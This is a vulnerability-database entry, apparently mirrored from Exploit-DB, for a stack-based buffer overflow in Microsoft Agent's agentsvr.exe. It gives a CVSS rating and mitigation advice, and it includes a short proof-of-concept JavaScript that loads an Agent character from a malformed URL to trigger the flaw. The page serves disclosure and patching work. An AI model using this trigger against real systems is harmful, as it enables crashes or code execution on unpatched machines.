header-logo
Suggest Exploit
vendor:
Microsoft Agent
by:
Not mentioned
7.5
CVSS
HIGH
Stack-based Buffer Overflow
121
CWE
Product Name: Microsoft Agent
Affected Version From: Not mentioned
Affected Version To: Not mentioned
Patch Exists: YES
Related CWE: Not mentioned
CPE: a:microsoft:agent
Metasploit:
Other Scripts:
Platforms Tested: Windows
Not mentioned

Stack-based Buffer Overflow in Microsoft Agent

The Microsoft Agent (agentsvr.exe) application is vulnerable to a stack-based buffer overflow. This vulnerability occurs due to the application's failure to properly validate user-supplied data, allowing remote attackers to execute arbitrary code in the context of the logged-in user. Failed exploit attempts may result in denial-of-service conditions.

Mitigation:

Apply the latest security updates from Microsoft to patch this vulnerability. Additionally, it is recommended to disable the Microsoft Agent feature if it is not required.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/25566/info

Microsoft Agent (agentsvr.exe) is prone to a stack-based buffer-overflow vulnerability because the application fails to adequately bounds-check user-supplied data.

Successfully exploiting this issue allows remote attackers to execute arbitrary code in the context of the currently logged-in user. Failed exploit attempts will likely result in denial-of-service conditions. 

<script language="javascript">
function document::OnClick() {
        var agent, character, url;
        agent = new ActiveXObject("Agent.Control.2");
        agent.connected = true;
        agent.Characters.Load("Genie", "http:///");
        character = agent.Characters.Character("Genie");
        character.Show();
        character.Think ("brazil owns!");
        character.Speak('brazil owns!');
        character.Play('Processing');
}
</script>